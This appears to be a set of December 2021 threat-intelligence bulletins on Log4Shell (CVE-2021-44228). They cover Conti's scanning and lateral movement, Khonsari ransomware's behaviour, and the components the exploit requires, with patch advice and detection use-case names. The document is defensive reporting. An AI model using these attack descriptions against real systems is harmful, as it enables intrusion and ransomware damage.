Conti & Log4Shell from AdvIntel

December 21, 2021

Conti & Log4Shell from AdvIntel

Industry: N/A | Level: Tactical | Source: AdvIntel

Continued vigilance on the threat landscape due to Log4Shell, has identified the Conti ransomware group showing signs of interest. A report from AdvIntel, detailed Conti had been deprived of new viable attack vectors since November, but had been searching for new methods. It wasn’t until the fallout of Log4Shell the ransomware group finally found what they’d been looking for. Multiple Conti members have been identified initiating scanning activity for the exploit. A recent quote from AdvIntel confirmed, “the criminals pursued targeting specific vulnerable Log4J2 VMware vCenter for lateral movement directly from the compromised network resulting in vCenter access affecting US and European victim networks from the pre-existent Cobalt Strike sessions.”

  • Anvilogic Scenarios:
    • Log4Shell Payload
    • Kinsing Behaviors
    • Unix File Download, Modified, Executed
  • Anvilogic Use Cases:
    • Potential CVE-2021-44228 – Log4Shell
    • File Download (Unix)
    • Modify File Attributes

Khonsari Ransomware & Log4Shell

December 21, 2021

Khonsari Ransomware & Log4Shell

Industry: N/A | Level: Tactical | Source: CadoSecurity

Ransomware family – Khonsari has been observed utilizing CVE-2021-44228/Log4Shell vulnerability targeting Windows servers.  The malware executable “groenhuyzen.exe” is dropped and exploits the JNDI class. The malware’s functionality is straightforward at only 12 KB, it’ll enumerate and encrypt (with extension – .khonsari) all mounted drives with the exception of C:\. Only user directories are encrypted including Documents, Videos, Pictures, Downloads, and Desktop.

  • Anvilogic Use Case: Potential CVE-2021-44228 – Log4Shell

CVE-2021-44228 / Log4Shell Vulnerability

December 10, 2021

CVE-2021-44228 / Log4Shell Vulnerability

Industry: N/A | Level: Tactical | Sources: LunaSec & GitHub-Log4Shell-List

A zero-day exploit has been identified for Java logging library “log4j” that could result in remote code execution. Affected versions include Log4j 2.0-beta9 up to 2.14.1 with service impacts to many Apache Struts configurations and cloud services such as Steam, Apple iCloud, and others.

The exploit requires three components a vulnerable log4j version, any protocol that enables the attack to send the exploit string, and a log statement that can log the string from the request.

Mitigation is available through an update with affected users recommended to update to log4j version “log4j-2.15.0-rc2”. Threat researchers have identified a variety of threats Kinsing (cryptocurrency miner), Mirai Malware, Cobalt Strike, a new unidentified ransomware strain, and likely others, yet to be identified, taking advantage of the widespread vulnerability.